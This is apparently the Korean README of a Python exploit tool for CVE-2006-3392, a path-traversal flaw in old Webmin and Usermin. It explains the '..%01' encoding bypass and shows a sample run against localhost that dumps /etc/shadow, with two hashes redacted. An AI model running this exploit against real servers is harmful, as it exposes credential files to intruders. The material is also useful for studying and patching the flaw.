
CVE-2006-3392에 대한 Python 익스플로잇. 이는 Webmin 및 Usermin의 경로 탐색 취약점으로, 원격 공격자가 인코딩된 디렉터리 탐색 시퀀스를 통해 임의의 파일을 읽을 수 있게 합니다.
Webmin 1.290 이전 버전과 Usermin 1.220 이전 버전은 HTML을 디코딩하기 전에 simplify_path 함수를 호출합니다. 이로 인해 원격 공격자가 임의의 파일을 읽을 수 있습니다. 예를 들어 "..%01" 시퀀스를 사용하여 "%01"과 같은 바이트가 파일 이름에서 제거되기 전에 "../" 시퀀스의 제거를 우회할 수 있습니다. 참고: 이는 CVE-2006-3274와 다른 문제입니다.
$ python3 CVE-2006-3392.py -u http://127.0.0.1:10000
_______ ________ ___ ___ ___ __ ____ ____ ___ ___
/ ____\ \ / / ____| |__ \ / _ \ / _ \ / / |___ \___ \ / _ \__ \
| | \ \ / /| |__ ______ ) | | | | | | |/ /_ ______ __) |__) | (_) | ) |
| | \ \/ / | __|______/ /| | | | | | | '_ \______|__ <|__ < \__, |/ /
| |____ \ / | |____ / /_| |_| | |_| | (_) | ___) |__) | / // /_
\_____| \/ |______| |____|\___/ \___/ \___/ |____/____/ /_/|____|
[Coded by Brosck]
[*] File path: /etc/shadow
root:[REDACTED]:17406:0:99999:7:::
daemon:*:17047:0:99999:7:::
bin:*:17047:0:99999:7:::
sys:*:17047:0:99999:7:::
sync:*:17047:0:99999:7:::
games:*:17047:0:99999:7:::
man:*:17047:0:99999:7:::
lp:*:17047:0:99999:7:::
mail:*:17047:0:99999:7:::
news:*:17047:0:99999:7:::
uucp:*:17047:0:99999:7:::
proxy:*:17047:0:99999:7:::
www-data:*:17047:0:99999:7:::
backup:*:17047:0:99999:7:::
list:*:17047:0:99999:7:::
irc:*:17047:0:99999:7:::
gnats:*:17047:0:99999:7:::
nobody:*:17047:0:99999:7:::
libuuid:!:17047:0:99999:7:::
Debian-exim:!:17047:0:99999:7:::
statd:*:17047:0:99999:7:::
sshd:*:17047:0:99999:7:::
mysql:!:17047:0:99999:7:::
proftpd:!:17406:0:99999:7:::
ftp:*:17406:0:99999:7:::
webmaster:[REDACTED]:17406:0:99999:7:::